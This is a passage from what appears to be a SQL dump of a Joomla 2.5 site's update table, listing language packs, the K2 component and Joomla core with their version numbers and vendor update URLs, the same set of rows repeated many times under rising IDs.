0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2542,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2543,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2544,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2545,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2546,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2547,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2548,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2549,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2550,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2551,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2552,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2553,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2554,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2555,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2556,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2557,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2558,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2559,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2560,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2561,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2562,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2563,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2564,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2565,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2566,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2567,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2568,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2569,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2570,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2571,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2572,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2573,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2574,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2575,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2576,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2577,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2578,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2579,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2580,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2581,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2582,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2583,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2584,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2585,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2586,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2587,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2588,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2589,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2590,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2591,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2592,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2593,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2594,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2595,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2596,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2597,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2598,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2599,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2600,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2601,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2602,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2603,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2604,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2605,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2606,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2607,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2608,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2609,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2610,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2611,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2612,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2613,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2614,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2615,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2616,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2617,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2618,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2619,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2620,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2621,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2622,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2623,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2624,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2625,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2626,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2627,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2628,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2629,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2630,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2631,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2632,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2633,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2634,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2635,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2636,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2637,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2638,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2639,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2640,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2641,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2642,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2643,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2644,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2645,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2646,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2647,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2648,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2649,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2650,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2651,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2652,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2653,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2654,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2655,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2656,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2657,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2658,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2659,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2660,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2661,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2662,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2663,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2664,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2665,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2666,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2667,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2668,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2669,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2670,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2671,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2672,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2673,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2674,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2675,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2676,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2677,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2678,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2679,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2680,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2681,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2682,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2683,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2684,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2685,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2686,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2687,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2688,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2689,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2690,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2691,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2692,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2693,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2694,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2695,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2696,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2697,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2698,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2699,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2700,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2701,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2702,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2703,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2704,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2705,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2706,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2707,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2708,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2709,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2710,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2711,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2712,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2713,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2714,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2715,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2716,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2717,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2718,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2719,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2720,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2721,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2722,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2723,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2724,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2725,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2726,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2727,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2728,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2729,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2730,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2731,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2732,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2733,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2734,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2735,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2736,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2737,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2738,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2739,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2740,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2741,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2742,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2743,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2744,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2745,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2746,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2747,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2748,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2749,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2750,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2751,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2752,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2753,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2754,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2755,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2756,3,0,0,'Tamil 